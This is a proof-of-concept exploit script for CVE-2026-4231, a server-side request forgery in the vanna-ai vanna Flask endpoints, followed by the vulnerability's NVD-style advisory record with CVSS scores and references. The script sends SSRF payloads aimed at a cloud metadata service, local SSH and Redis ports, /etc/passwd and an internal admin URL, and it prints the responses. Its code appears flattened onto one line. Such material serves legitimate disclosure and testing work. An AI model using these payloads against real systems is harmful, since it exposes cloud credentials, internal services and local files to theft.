CVE-2026-4231

import requests import json # CVE-2026-4231 SSRF PoC for vanna-ai vanna <= 2.0.2 # Target: http://target.com:5000 target = "http://target.com:5000" # Target internal metadata service payloads = [ "http://169.254.169.254/latest/meta-data/", "http://localhost:22/", "file:///etc/passwd", "http://127.0.0.1:6379/info" ] headers = { "Content-Type": "application/json" } for payload in payloads: # Test update_sql endpoint data = { "sql": f"SELECT '{payload}'", "vanna_connection": { "url": payload } } try: response = requests.post( f"{target}/update-sql", json=data, headers=headers, timeout=10 ) print(f"Payload: {payload}") print(f"Status: {response.status_code}") print(f"Response: {response.text[:500]}") print("-" * 50) except Exception as e: print(f"Error with payload {payload}: {e}") # Alternative: Direct SSRF via run_sql ssrf_data = { "question": "test", "custom_id": "test", "url": "http://internal-service:8080/admin" } response = requests.post( f"{target}/run-sql", json=ssrf_data, headers=headers, timeout=10 ) print(f"SSRF Response: {response.text[:500]}")

{"cve": {"id": "CVE-2026-4231", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:16.770", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in vanna-ai vanna up to 2.0.2. Affected by this vulnerability is the function update_sql/run_sql of the file src/vanna/legacy/flask/__init__.py of the component Endpoint. Performing a manipulation results in server-side request forgery. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue encontrada en vanna-ai vanna hasta 2.0.2. Afectada por esta vulnerabilidad es la función update_sql/run_sql del archivo src/vanna/legacy/flask/__init__.py del componente Endpoint. Realizar una manipulación resulta en falsificación de petición del lado del servidor. El ataque puede ser iniciado remotamente. El exploit ha sido hecho público y podría ser usado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://gist.github.com/YLChen-007/574542015755951ee1d53206022cc754", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351154", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351154", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771217", "source": "[email protected]"}]}}